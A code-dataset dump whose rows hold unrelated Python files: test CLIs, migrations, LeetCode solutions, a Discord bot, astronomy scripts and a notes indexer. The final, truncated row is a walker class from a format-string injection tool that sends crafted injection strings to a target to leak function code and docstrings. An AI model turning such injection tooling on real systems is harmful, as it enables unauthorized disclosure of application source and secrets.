max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
jobson_systemtests/cli.py | adamkewley/jobson_systemtests | 0 | 12796151 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
import jobson_systemtests
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser(description='Run jobson system tests')
parser.add_argument(
'specs_dir',
type=str,
help='Path to directory containing jobson specs (and tests)')
parser.add_argument(
'host',
type=str,
help='The host running the server (e.g. localhost)')
parser.add_argument(
'port',
type=int,
help='The port the Jobson API is listening on (e.g. 8080)')
parser.add_argument(
'login',
type=str,
help='The login to use to access the API')
parser.add_argument(
'password',
type=str,
        help='The password to use to access the API')
args = parser.parse_args(argv[1:])
jobson_systemtests.run(
specs_dir=args.specs_dir,
host=args.host,
port=args.port,
login=args.login,
password=args.password)
return 0
if __name__ == "__main__":
sys.exit(main())
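# Example invocation (a sketch; the spec directory, host, port and credentials
# below are placeholders, not values taken from the original project):
#
#     python cli.py /path/to/specs localhost 8080 some-login some-password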
| 2.328125 | 2 |
conventions/migrations/0008_auto_20210831_1707.py | MTES-MCT/appel | 0 | 12796152 |
# Generated by Django 3.2.5 on 2021-08-31 15:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("conventions", "0007_auto_20210831_0908"),
]
operations = [
migrations.AddField(
model_name="convention",
name="fond_propre",
field=models.FloatField(null=True),
),
migrations.AlterField(
model_name="convention",
name="numero",
field=models.CharField(max_length=255, null=True),
),
]
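# For reference, a sketch (inferred from the operations above, not code copied
# from the project) of how the touched fields look on the model afterwards:
#
#     class Convention(models.Model):
#         fond_propre = models.FloatField(null=True)
#         numero = models.CharField(max_length=255, null=True)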
| 1.382813 | 1 |
src/findRepeatedDnaSequences.py | JL1829/LeetCode | 0 | 12796153 |
"""
All DNA is composed of a series of nucleotides abbreviated as `A`, `C`, `G`, and `T`, for example:
`ACGAATTCCG`. When studying DNA, identifying repeated sequences within it can sometimes be very helpful.
Write a function that finds all target substrings of length `L` that appear more than once in the DNA string `s`.
**test case**
>>> s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
>>> findRepeatedDnaSequence(sequence=s, length=10)
['AAAAACCCCC', 'CCCCCAAAAA']
>>> s = 'AAAAAAAAAAAAA'
>>> findRepeatedDnaSequence(sequence=s, length=10)
['AAAAAAAAAA']
# Solution
***
## Approach 1
A simple fixed-length sliding window of length L, advanced one position at a time from the left,
using two set()s: one to store substrings already seen and one to collect the output.
"""
def findRepeatedDnaSequence(sequence, length):
n = len(sequence)
seen = set()
output = set()
# iterate over all sequences of length
for start in range(n - length + 1):
tmp = sequence[start:start + length]
if tmp in seen:
output.add(tmp[:])
seen.add(tmp)
return list(output)
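# A minimal sketch (not part of the original solution) for checking the doctest
# examples embedded in the module docstring above; note that the expected lists
# depend on set iteration order, so a failure may only indicate a different ordering:
if __name__ == '__main__':
    import doctest
    doctest.testmod()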
if __name__ == '__main__':
s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT'
s2 = 'AAAAAAAAAAAAA'
print(f"For input DNA string: {s1}"
f"\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}")
print(f"For input DNA string: {s2}"
f"\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2, length=10)}")
| 3.78125 | 4 |
onyx/main.py | mudkipdev/onyx | 0 | 12796154 | from discord.ext import commands
import discord
import yaml
import os
class Bot(commands.Bot):
    async def get_prefix(self, bot, message):
        """Return the prefixes the bot responds to (a mention or "onyx ")."""
        return commands.when_mentioned_or("onyx ")(bot, message)
def __init__(self):
"""Initialize the bot and load all extensions."""
with open("C:/onyx/config.yml", encoding = "UTF-8") as f:
self.config = yaml.safe_load(f)
super().__init__(
command_prefix = self.get_prefix,
intents = discord.Intents.default()
)
client = Bot()
client.load_extension("jishaku") # Load the debugging cog.
@client.check
async def check(ctx):
return True
token = os.getenv("TOKEN")
client.run(token)
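# A minimal sketch (assuming TOKEN may be unset in the environment) of failing
# fast with a clear message instead of passing None to client.run():
#
#     if token is None:
#         raise SystemExit("Set the TOKEN environment variable before starting the bot.")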
| 2.515625 | 3 |
src/search/views.py | l27-0-0-1/sigma | 0 | 12796155 | import urllib.parse
from django.shortcuts import render
#from ckan_model import stub as ckan
from ckan_model import production as ckan
#from ..ckan_model import production as ckan
import django.http
def index(request: django.http.HttpRequest):
payload = {}
google = ckan.Search()
payload['top_tags'] = google.top_tags()
return render(request, 'index.html', context=payload)
def search(request: django.http.HttpRequest):
# it's a search engine!
google = ckan.Search()
payload = {}
payload['tags'] = google.tags_list()
payload['unis'] = google.university_list()
page = int(request.GET.get('page', 1))
page_size = 10
start_pos = (page - 1) * page_size
if request.GET:
response = google.students(request.GET.getlist('selected_tags'),
request.GET.getlist('selected_unis'),
start=start_pos,
rows=page_size
)
else:
response = google.students()
total = response['total']
pages_count = total//10+bool(total%10)
actual_page = start_pos//page_size + 1
parsed_url = list(urllib.parse.urlparse(request.get_full_path()))
options = dict(urllib.parse.parse_qsl(parsed_url[4]))
def change_url(n):
options['page'] = n
parsed_url[4] = urllib.parse.urlencode(options)
return urllib.parse.urlunparse(parsed_url)
pages = [{'number': n,
'url': change_url(n),
              'active': n == actual_page} for n in range(1, pages_count + 1)]
payload["pagination"] = { "pages": pages,
"prev": actual_page > 1,
"next": actual_page < pages_count,
}
payload['results'] = response['results']
    return render(request, 'search.html', payload)
| 2.140625 | 2 |
plot_redshift_distr.py | anjmittu/SwiftGRB_PEanalysis-master | 5 | 12796156 | import numpy as np
from scipy.integrate import quad
import matplotlib.pyplot as plt
def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)):
Rlow = np.power((1.0 + z), n1)
Rhigh = np.power((1.0 + z), n2)
rbrk = np.power((1.0 + z1), n1 - n2)
R = Rlow * (z <= z1) + rbrk * Rhigh * (z > z1)
R *= n0 / R[0]
return z, R
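# In equation form, Redshift() above implements a broken power law in (1 + z):
#
#     R(z) = n0 * (1 + z)**n1                         for z <= z1
#     R(z) = n0 * (1 + z1)**(n1 - n2) * (1 + z)**n2   for z >  z1
#
# normalised so that R(0) = n0 (the `R *= n0 / R[0]` step).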
z, R = Redshift(0.84, 2.07, -0.7)
plt.plot(z,R,'-k')
plt.xlabel(r'$z$')
plt.ylabel(r'$\mathcal{R}(z)$')
plt.grid()
#plt.gca().set_yscale('log')
plt.show()
#### This computes E(z) and int_0^z dz'/E(z') and saves to file
def Efunc(z):
Omega_m = 0.274
Omega_lambda = 0.726
E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda)
return E
def Efuncinv(z):
return 1.0 / Efunc(z)
z = np.linspace(0,10,num=1001)
dz = z[1] - z[0]
E = Efunc(z)
Eics = np.zeros(E.shape)
for i in range(len(Eics)):
Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0
#Eics = np.square(np.cumsum(1.0 / E) * dz)
#Eics[1:] = Eics[:-1]
#Eics[0] = 0
Eall = Eics / E;
z = z.reshape(z.shape[0],1)
E = E.reshape(E.shape[0],1)
Eics = Eics.reshape(Eics.shape[0],1)
Eall = Eall.reshape(Eall.shape[0],1)
d = np.concatenate((z,E,Eics,Eall),axis=1)
np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf')
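# For reference, the columns saved above are z, E(z), (int_0^z dz'/E(z'))**2 and
# that squared integral divided by E(z), where
#
#     E(z) = sqrt(Omega_m * (1 + z)**3 + Omega_lambda)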
z2, R = Redshift(0.84, 2.07, -0.7, z=z)
Rp = R / (1+z) * Eall
plt.plot(z,Rp,'-k')
plt.plot(z,R/(1+z),'--b')
plt.plot(z,Eall,'-.r')
#plt.plot(z,np.cumsum(Eall),'-g')
plt.xlabel(r'$z$')
plt.grid()
plt.show()
| 2.609375 | 3 |
Leetcode/1000-2000/1872. Stone Game VIII/1872.py | Next-Gen-UI/Code-Dynamics | 0 | 12796157 |
import math
from itertools import accumulate
from typing import List
class Solution:
def stoneGameVIII(self, stones: List[int]) -> int:
n = len(stones)
prefix = list(accumulate(stones))
# dp[i] := max score diff the current player can get when the game starts
# at i, i.e., stones[0..i] are merged whose value is prefix[i]
dp = [-math.inf] * n
# must take all when there're only two stones left
dp[n - 2] = prefix[-1]
for i in reversed(range(n - 2)):
dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1])
return dp[0]
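# A quick sanity check against the sample input from the problem statement
# (the input and expected value below are assumptions based on LeetCode 1872):
if __name__ == '__main__':
    print(Solution().stoneGameVIII([-1, 2, -3, 4, -5]))  # expected: 5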
| 3.1875 | 3 |
src/jupyter_contrib_nbextensions/hello.py | satishv21/jupyter_contrib_nbextensions | 0 | 12796158 |
def main(str):
print("nonce")
| 1.117188 | 1 |
game_summary/__init__.py | ch4zm/blaseball-game-summary | 0 | 12796159 |
_program = "game-summary"
__version__ = "0.7.1"
| 1.007813 | 1 |
examples/reply_keyboard/button.py | dotX12/waio | 24 | 12796160 | from waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage
from callback import callback_reply_keyboard
def generate_keyboard_place():
kb_content = QuickReplyContentText(
header="Куда вы сегодня хотите сходить?",
text="Выберите из предложенного списка",
caption=""
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="place", id="1"), content=kb_content)
kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан'))
return kb
def generate_keyboard_cinema_time():
kb_content = QuickReplyContentText(
header="Кинотеатр",
text="Выберите удобное для Вас время",
caption=""
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="cinema_time", id="2"), content=kb_content)
kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00'))
return kb
def generate_keyboard_restaurant_time():
kb_content = QuickReplyContentText(
header="Ресторан",
text="Выберите удобное для Вас время",
caption="",
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="restaurant_time", id="2"), content=kb_content)
kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00'))
return kb
def generate_keyboard_image():  # A keyboard can be sent with an image instead of a header; not used in this example.
kb_content = QuickReplyContentImage(
url="https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg",
text="this is the body",
caption="this is the footer"
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(type="start", id="1"), content=kb_content)
kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан'))
return kb
| 2.453125 | 2 |
KAT7/reduction/horizon_mask_reduction.py | ska-sa/katsdpscripts | 0 | 12796161 |
#!/usr/bin/python
# Plot horizon mask
import optparse
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import scape
from katpoint import rad2deg
def remove_rfi(d,width=3,sigma=5,axis=1):
for i in range(len(d.scans)):
d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma)
return d
def main():
# Parse command-line options and arguments
parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]',
description='Display a horizon mask from a set of data files.')
parser.add_option('-a', '--baseline', dest='baseline', type="string", metavar='BASELINE', default='A1A1',
help="Baseline to load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline in file")
parser.add_option('-o', '--output', dest='output', type="string", metavar='OUTPUTFILE', default=None,
help="Write out intermediate h5 file")
parser.add_option('-s', '--split', dest='split', action="store_true", metavar='SPLIT', default=False,
help="Whether to split each horizon plot in half")
parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0,
help="Degrees to rotate azimuth window by.")
parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0,
                      help="The temperature limit used as the cut-off for the mask. This is calculated "
                           "as the T_sys at zenith plus the atmospheric noise contribution at 10 degrees "
                           "elevation as per R.T. 199.")
parser.add_option("-n", "--nd-models",
help="Name of optional directory containing noise diode model files")
(opts, args) = parser.parse_args()
# Check arguments
if len(args) < 1:
raise RuntimeError('Please specify the data file to reduce')
# Load data set
gridtemp = []
for filename in args:
print 'Loading baseline', opts.baseline, 'from data file', filename
d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models)
if len(d.freqs) > 1:
            # Only keep main scans (discard slew and cal scans)
d = d.select(freqkeep=range(200, 800))
d = remove_rfi(d,width=7,sigma=5)
d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0)
d = d.select(flagkeep='~nd_on')
d = d.select(labelkeep='scan', copy=False)
# Average all frequency channels into one band
d.average()
# Extract azimuth and elevation angle from (azel) target associated with scan, in degrees
azimuth, elevation, temp = [], [], []
for s in d.scans:
azimuth.extend(rad2deg(s.pointing['az']))
elevation.extend(rad2deg(s.pointing['el']))
temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0])))
assert len(azimuth) == len(elevation) == len(temp), "sizes don't match"
data = (azimuth, elevation, temp)
np.array(azimuth)<-89
print "Gridding the data"
print "data shape = ",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist())
print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist())
print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist())
gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1)))
# The +361 is to ensure that the point are well spaced,
#this offset is not a problem as it is just for sorting out a boundery condition
print "Completed Gridding the data"
print "Making the mask"
mask = gridtemp[0] >= opts.temp_limit
for grid in gridtemp:
mask = mask * (grid >= opts.temp_limit)
maskr = np.zeros((len(np.arange(-90,271,1)),2))
for i,az in enumerate(np.arange(-90,271,1)):
print 'at az %f'%(az,)
maskr[i] = az,np.max(elevation)
for j,el in enumerate(np.arange(4,16,0.1)):
if ~mask.data[j,i] and ~mask.mask[j,i] :
maskr[i] = az,el
break
np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:])
#plt.figure()
#plt.subplot(1, 1, 1)
#plt.plot(maskr[1:,0],maskr[1:,1])
#az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,))
#plt.xlabel(az_title)
#plt.ylabel(el_title)
#plt.ylim(0,15)
#plt.title(big_title)
#plt.show()
if __name__ == "__main__":
main()
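# Example invocation (a sketch; the data file name is a placeholder):
#
#     python horizon_mask_reduction.py -a A1A1 --temp-limit 40.0 1234567890.h5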
| 2.53125 | 3 |
vim/vimfiles/python3/search_notes.py | sharat87/lawn | 5 | 12796162 | #!/usr/bin/env python
# Python script for fast text file searching using keyword index on disk.
#
# Author: <NAME> <<EMAIL>>
# Last Change: November 1, 2015
# URL: http://peterodding.com/code/vim/notes/
# License: MIT
#
# This Python script can be used by the notes.vim plug-in to perform fast
# keyword searches in the user's notes. It has two advantages over just
# using Vim's internal :vimgrep command to search all of the user's notes:
#
# - Very large notes don't slow searching down so much;
# - Hundreds of notes can be searched in less than a second.
#
# The keyword index is a Python dictionary that's persisted using the pickle
# module. The structure of the dictionary may seem very naive but it's quite
# fast. Also the pickle protocol makes sure repeating strings are stored only
# once, so it's not as bad as it may appear at first sight :-).
#
# For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/.
"""
Usage: search_notes.py [OPTIONS] KEYWORD...
Search one or more directories of plain text files using a full text index,
updated automatically during each invocation of the program.
Valid options include:
-i, --ignore-case ignore case of keyword(s)
-l, --list=SUBSTR list keywords matching substring
-d, --database=FILE set path to keywords index file
-n, --notes=DIR set directory with user notes (can be repeated)
-e, --encoding=NAME set character encoding of notes
-v, --verbose make more noise
-h, --help show this message and exit
For more information see http://peterodding.com/code/vim/notes/
"""
# Standard library modules.
import codecs
import fnmatch
import getopt
import logging
import os
import re
import sys
import time
import pickle
from typing import List, Set
try:
import Levenshtein
except ImportError:
Levenshtein = None
# The version of the index format that's supported by this revision of the
# `search_notes.py' script; if an existing index file is found with an
# unsupported version, the script knows that it should rebuild the index.
INDEX_VERSION = 3
# Filename matching patterns of files to ignore during scans.
INCLUDE_PATTERNS = {'*.md', '*.txt'}
NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')]
INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle')
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
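# For orientation, a sketch (inferred from the code below, not from the original
# documentation) of how the pickled index is shaped:
#
#     {
#         'version': 3,
#         'files': {'/path/to/note.md': 1446372000.0, ...},        # mtime per note
#         'keywords': {'python': ['/path/to/note.md', ...], ...},  # keyword -> notes
#     }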
def load_index(index_location):
try:
load_timer = Timer()
logger.debug("Loading index from %s ..", index_location)
with open(index_location, 'rb') as handle:
index = pickle.load(handle)
logger.debug("Format version of index loaded from disk: %i", index['version'])
assert index['version'] == INDEX_VERSION, "Incompatible index format detected!"
logger.debug("Loaded %i notes from index in %s", len(index['files']), load_timer)
except Exception:
logger.warning("Failed to load index from file!", exc_info=True)
return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
else:
return index
class TextIndex:
def __init__(self, index_location: str, notes_directories: List[str]):
self.index_location = index_location
self.notes_directories = notes_directories
self.index = load_index(self.index_location)
def search(self, query: str) -> List[str]:
"""Return names of files containing all of the given keywords."""
print('Searching index')
index = load_index(INDEX_FILE_PATH)
needles = query.split()
matches = None
normalized_db_keywords = [(k, k.lower()) for k in index['keywords']]
for word in needles:
submatches = set()
for original_db_kw, normalized_db_kw in normalized_db_keywords:
if word in normalized_db_kw:
submatches.update(index['keywords'][original_db_kw])
if matches is None:
matches = submatches
else:
matches &= submatches
return sorted(matches) if matches else []
def update_index(self):
"""Update the keyword index by scanning the notes directory."""
user_directories = self.notes_directories
index = self.index
# First we find the filenames and last modified times of the notes on disk.
notes_on_disk = {}
last_count = 0
for directory in user_directories:
for root, dirs, files in os.walk(directory):
for filename in files:
if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
abspath = os.path.join(root, filename)
notes_on_disk[abspath] = os.path.getmtime(abspath)
logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
last_count = len(notes_on_disk)
logger.info("Found a total of %i notes ..", len(notes_on_disk))
# Check for updated and/or deleted notes since the last run?
if index:
for filename in set(index['files'].keys()):
if filename not in notes_on_disk:
# Forget a deleted note.
self.delete_note_from_index(index, filename)
else:
# Check whether previously seen note has changed?
last_modified_on_disk = notes_on_disk[filename]
last_modified_in_db = index['files'][filename]
if last_modified_on_disk > last_modified_in_db:
self.delete_note_from_index(index, filename)
self.add_note_to_index(index, filename, last_modified_on_disk)
# Already checked this note, we can forget about it.
del notes_on_disk[filename]
# Add new notes to index.
for filename, last_modified in notes_on_disk.items():
self.add_note_to_index(index, filename, last_modified)
# TODO: Only save if necessary.
self.save_index(INDEX_FILE_PATH, index)
def add_note_to_index(self, index, filename, last_modified):
"""Add a note to the index (assumes the note is not already indexed)."""
logger.info("Adding file to index: %s", filename)
index['files'][filename] = last_modified
with open(filename, encoding='utf-8') as handle:
raw = handle.read()
for kw in tokenize(raw):
if kw not in index['keywords']:
index['keywords'][kw] = [filename]
else:
index['keywords'][kw].append(filename)
def delete_note_from_index(self, index, filename):
"""Delete a note from given index."""
logger.info("Deleting file from index: %s", filename)
del index['files'][filename]
for kw in index['keywords']:
index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename]
def tokenize(self, text: str) -> Set[str]:
"""Tokenize a string into a list of normalized, unique keywords."""
return {w.strip() for w in re.findall(r'\w{3,}', text, re.UNICODE) if not w.isspace()}
def save_index(self, database_file: str, index):
"""Save the keyword index to disk."""
with open(database_file, 'wb') as handle:
pickle.dump(index, handle)
class NotesIndex:
def __init__(self, argv=None):
"""Entry point to the notes search."""
global_timer = Timer()
keywords = self.parse_args(argv or sys.argv[1:])
self.load_index()
self.update_index()
if self.dirty:
self.save_index()
if self.keyword_filter is not None:
self.list_keywords(self.keyword_filter)
logger.debug("Finished listing keywords in %s", global_timer)
else:
matches = self.search_index(keywords)
if matches:
print('\n'.join(sorted(matches)))
logger.debug("Finished searching index in %s", global_timer)
def parse_args(self, argv):
"""Parse the command line arguments."""
try:
opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [
'ignore-case', 'list=', 'database=', 'notes=', 'encoding=',
'verbose', 'help',
])
except getopt.GetoptError as error:
print(str(error))
self.usage()
sys.exit(2)
# Define the command line option defaults.
self.database_file = '~/.vim/misc/notes/index.pickle'
self.user_directories = ['~/.vim/misc/notes/user/']
self.character_encoding = 'UTF-8'
self.case_sensitive = True
self.keyword_filter = None
# Map command line options to variables.
for opt, arg in opts:
if opt in ('-i', '--ignore-case'):
self.case_sensitive = False
logger.debug("Disabling case sensitivity")
elif opt in ('-l', '--list'):
self.keyword_filter = arg.strip().lower()
elif opt in ('-d', '--database'):
self.database_file = arg
elif opt in ('-n', '--notes'):
self.user_directories.append(arg)
elif opt in ('-e', '--encoding'):
self.character_encoding = arg
elif opt in ('-v', '--verbose'):
logger.setLevel(logging.DEBUG)
elif opt in ('-h', '--help'):
self.usage()
sys.exit(0)
else:
assert False, "Unhandled option"
logger.debug("Index file: %s", self.database_file)
logger.debug("Notes directories: %r", self.user_directories)
logger.debug("Character encoding: %s", self.character_encoding)
if self.keyword_filter is not None:
self.keyword_filter = self.decode(self.keyword_filter)
# Canonicalize pathnames, check validity.
self.database_file = self.munge_path(self.database_file)
self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)]
# Return tokenized keyword arguments.
return [self.normalize(k) for k in self.tokenize(' '.join(keywords))]
def load_index(self):
"""Load the keyword index or start with an empty one."""
try:
load_timer = Timer()
logger.debug("Loading index from %s ..", self.database_file)
with open(self.database_file, 'rb') as handle:
self.index = pickle.load(handle)
logger.debug("Format version of index loaded from disk: %i", self.index['version'])
assert self.index['version'] == INDEX_VERSION, "Incompatible index format detected!"
self.first_use = False
self.dirty = False
logger.debug("Loaded %i notes from index in %s", len(self.index['files']), load_timer)
except Exception:
            logger.warning("Failed to load index from file!", exc_info=True)
self.first_use = True
self.dirty = True
self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
def save_index(self):
"""Save the keyword index to disk."""
save_timer = Timer()
with open(self.database_file, 'wb') as handle:
pickle.dump(self.index, handle)
logger.debug("Saved index to disk in %s", save_timer)
def update_index(self):
"""Update the keyword index by scanning the notes directory."""
update_timer = Timer()
# First we find the filenames and last modified times of the notes on disk.
notes_on_disk = {}
last_count = 0
for directory in self.user_directories:
print('Scanning', directory)
for root, dirs, files in os.walk(directory):
for filename in files:
if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
abspath = os.path.join(root, filename)
notes_on_disk[abspath] = os.path.getmtime(abspath)
logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
last_count = len(notes_on_disk)
logger.info("Found a total of %i notes ..", len(notes_on_disk))
# Check for updated and/or deleted notes since the last run?
if not self.first_use:
            for filename in list(self.index['files'].keys()):
if filename not in notes_on_disk:
# Forget a deleted note.
self.delete_note(filename)
else:
# Check whether previously seen note has changed?
last_modified_on_disk = notes_on_disk[filename]
last_modified_in_db = self.index['files'][filename]
if last_modified_on_disk > last_modified_in_db:
self.delete_note(filename)
self.add_note(filename, last_modified_on_disk)
# Already checked this note, we can forget about it.
del notes_on_disk[filename]
# Add new notes to index.
for filename, last_modified in notes_on_disk.items():
self.add_note(filename, last_modified)
logger.info("Updated index in %s", update_timer)
def add_note(self, filename, last_modified):
"""Add a note to the index (assumes the note is not already indexed)."""
logger.info("Adding file to index: %s", filename)
self.index['files'][filename] = last_modified
with open(filename, encoding='utf-8') as handle:
for kw in self.tokenize(handle.read()):
if kw not in self.index['keywords']:
self.index['keywords'][kw] = [filename]
else:
self.index['keywords'][kw].append(filename)
self.dirty = True
def delete_note(self, filename):
"""Remove a note from the index."""
logger.info("Removing file from index: %s", filename)
del self.index['files'][filename]
for kw in self.index['keywords']:
self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]
self.dirty = True
def search_index(self, keywords):
"""Return names of files containing all of the given keywords."""
matches = None
normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]
for usr_kw in keywords:
submatches = set()
for original_db_kw, normalized_db_kw in normalized_db_keywords:
# Yes I'm using a nested for loop over all keywords in the index. If
# I really have to I'll probably come up with something more
# efficient, but really it doesn't seem to be needed -- I have over
# 850 notes (about 8 MB) and 25000 keywords and it's plenty fast.
if usr_kw in normalized_db_kw:
submatches.update(self.index['keywords'][original_db_kw])
if matches is None:
matches = submatches
else:
matches &= submatches
return list(matches) if matches else []
def list_keywords(self, substring, limit=25):
"""Print all (matching) keywords to standard output."""
print('listing keywords')
decorated = []
substring = self.normalize(substring)
for kw, filenames in self.index['keywords'].items():
normalized_kw = self.normalize(kw)
if substring in normalized_kw:
if Levenshtein is not None:
decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw))
else:
decorated.append((-len(filenames), kw))
decorated.sort()
selection = [d[-1] for d in decorated[:limit]]
print(selection)
print(self.encode(u'\n'.join(selection)))
def tokenize(self, text):
"""Tokenize a string into a list of normalized, unique keywords."""
words = set()
text = self.decode(text)
for word in re.findall(r'\w+', text, re.UNICODE):
word = word.strip()
if word != '' and not word.isspace() and len(word) >= 2:
words.add(word)
return words
def normalize(self, keyword):
"""Normalize the case of a keyword if configured to do so."""
return keyword if self.case_sensitive else keyword.lower()
def encode(self, text):
"""Encode a string in the user's preferred character encoding."""
if isinstance(text, str):
text = codecs.encode(text, self.character_encoding, 'ignore')
return text
def decode(self, text):
"""Decode a string in the user's preferred character encoding."""
if isinstance(text, bytes):
text = codecs.decode(text, self.character_encoding, 'ignore')
return text
def munge_path(self, path):
"""Canonicalize user-defined path, making it absolute."""
return os.path.abspath(os.path.expanduser(path))
def usage(self):
print(__doc__.strip())
class Timer:
"""Easy to use timer to keep track of long during operations."""
def __init__(self):
self.start_time = time.time()
def __str__(self):
return "%.2f seconds" % self.elapsed_time
@property
def elapsed_time(self):
return time.time() - self.start_time
if __name__ == '__main__':
NotesIndex()
| 3.15625 | 3 |
formatic/walkers/function_injection_walker.py | welchbj/formatic | 2 | 12796163 | """Implementation of the FunctionInjectionWalker class."""
from inspect import (
signature as inspect_signature)
from types import (
CodeType,
FunctionType)
from typing import (
Iterator,
Optional)
from .abstract_injection_walker import (
AbstractInjectionWalker)
from .code_object_injection_walker import (
CodeObjectInjectionWalker)
from .doc_string_injection_walker import (
DocStringInjectionWalker)
from .failed_injection_walker import (
FailedInjectionWalker)
from .name_injection_walker import (
NameInjectionWalker)
class FunctionInjectionWalker(AbstractInjectionWalker):
"""Injection walker for a function.
This module will attempt to recover the source code from a function, via
access to its ``__code__`` attribute.
"""
INJECTION_RE = None
RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>'
def __extra_init__(
self
) -> None:
self._code_walker: Optional[CodeObjectInjectionWalker] = None
self._name_walker: NameInjectionWalker = \
self.empty_instance(NameInjectionWalker)
self._docstring_walker: DocStringInjectionWalker = \
self.empty_instance(DocStringInjectionWalker)
self._src_code: Optional[str] = None
self._signature: Optional[str] = None
@property
def code_walker(
self
) -> Optional[CodeObjectInjectionWalker]:
"""The code object that this walker recovered from the target.
This attribute will only be populated after a call to :func:`walk`. If
the call to ``walk()`` cannot recover the object, then this attribute
will remain as ``None``.
"""
return self._code_walker
@property
def name_walker(
self
) -> NameInjectionWalker:
"""Walker used to recover this function's __name__."""
return self._name_walker
@property
def docstring_walker(
self
) -> DocStringInjectionWalker:
"""Walker used to recover this function's __doc__ string."""
return self._docstring_walker
@property
def src_code(
self
) -> Optional[str]:
"""The source code that this walker recovered from the target."""
return self._src_code
@property
def signature(
self
) -> Optional[str]:
"""The decompiled function's signature, if one was retrieved."""
return self._signature
def walk(
self
) -> Iterator[AbstractInjectionWalker]:
yield from self._walk_name()
if not self._name_walker.is_default:
if self._name_walker.value in self._engine.function_blacklist:
return
self._engine.function_blacklist.add(self._name_walker.value)
yield from self._walk_docstring()
code_obj_injection = f'{self._injection_str}.__code__'
raw_result = self._harness.send_injection(code_obj_injection)
if raw_result is None:
yield FailedInjectionWalker.msg(
'Unable to recover injection response from string '
f'{raw_result}')
return
walker = self.next_walker(code_obj_injection, raw_result)
if walker is None:
yield FailedInjectionWalker.msg(
'No matching walker found for injection response '
f'{raw_result}')
return
elif not isinstance(walker, CodeObjectInjectionWalker):
yield FailedInjectionWalker.msg(
f'Got {type(walker)} when injecting function __code__ '
'attribute; something is terribly wrong...')
return
for sub_walker in walker.walk():
yield sub_walker
if walker.code_obj is None or walker.src_code is None:
yield FailedInjectionWalker.msg(
'Unable to successfully recover code object from string '
f'{walker.injection_str}')
return
src_lines = ([] if walker.src_code is None else
walker.src_code.splitlines())
indented_src_lines = [f' {line}' for line in src_lines]
self._signature = self.__class__.code_obj_to_signature(
walker.code_obj)
self._src_code = f'{self._signature}\n'
if self._docstring_walker.value:
